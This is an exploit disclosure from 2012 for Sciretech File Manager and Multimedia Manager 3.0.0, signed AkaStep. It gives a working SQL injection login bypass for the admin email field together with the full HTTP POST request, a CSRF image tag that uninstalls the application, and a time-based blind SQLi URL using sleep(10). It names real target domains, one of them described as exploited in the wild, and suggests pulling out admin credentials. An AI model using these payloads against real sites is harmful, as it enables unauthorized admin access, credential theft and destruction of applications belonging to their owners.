Sciretech file Manager version 3.0.0 and Multimedia Manager version 3.0.0 suffer from cross site request forgery and remote blind SQL injection vulnerabilities.
7f0570634cc662059586bc24b8e757681338abfe415fefd46664042dde9f941d
=========================================================
Vulnerable Software: Sciretech ® Multimedia Manager Version 3.0.0
Aka:
Sciretech ® File Manager Version 3.0.0
Official site: www.sciretech.com
Vulnerabilities: Blind SQL Injection And CSRF
Dork: Google is Best Your Friend.Isn't?)
Discovered and Exploited in Wild.(For Pwn domain: software.yna.am)
===========================================================
Official Demo:
www.sciretech.com/demo/
Email: admin@domain.com' and 99=99-- and 0='0
PASS: whateveryouwant
Note that: You need to enter valid email of admin.
In most cases it is: admin@MUST_PWN_THIS_DOMAIN.tld
Let me enlight it for you:
Host: www.sciretech.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=brn7te3s5dtkmo63578umm6kp7
Content-Type: application/x-www-form-urlencoded
Content-Length: 123
POST DATA:
dbuser_user_email=admin%40domain.com%27+and+99%3D99--+and+0%3D%270&dbuser_user_password=WILL_BYPASS_IT_LIKE_2X2&login=Login
You will be logged to administration panel=> http://www.sciretech.com/demo/index.php?module=system&content=index
Host: www.sciretech.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=brn7te3s5dtkmo63578umm6kp7
==============================================================
CSRF UNINSTALL APPLICATION:( BTW,Very usefull xD )
<img src="http://software.yna.am/index.php?module=control_panel&content=execute&execute=uninstall" heigth="0" width="0" />
==============================================================
Next another Blind SQLi:
http://software.yna.am//index.php?module=user&content=execute&execute=user_account_activation&user_email=pipi@pipi.com%27%20or%20sleep%2810%29--%20and%205=%275&activation_key=TS0nz4hLVgZ83mrvgtPS
======================================================================
If you unable to find valid email of admin use time Based way to obtain EMAIL:PASSWORD
======================================================================
SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
======================================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all Aa Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
========================================================================
/AkaStep
02.09.2012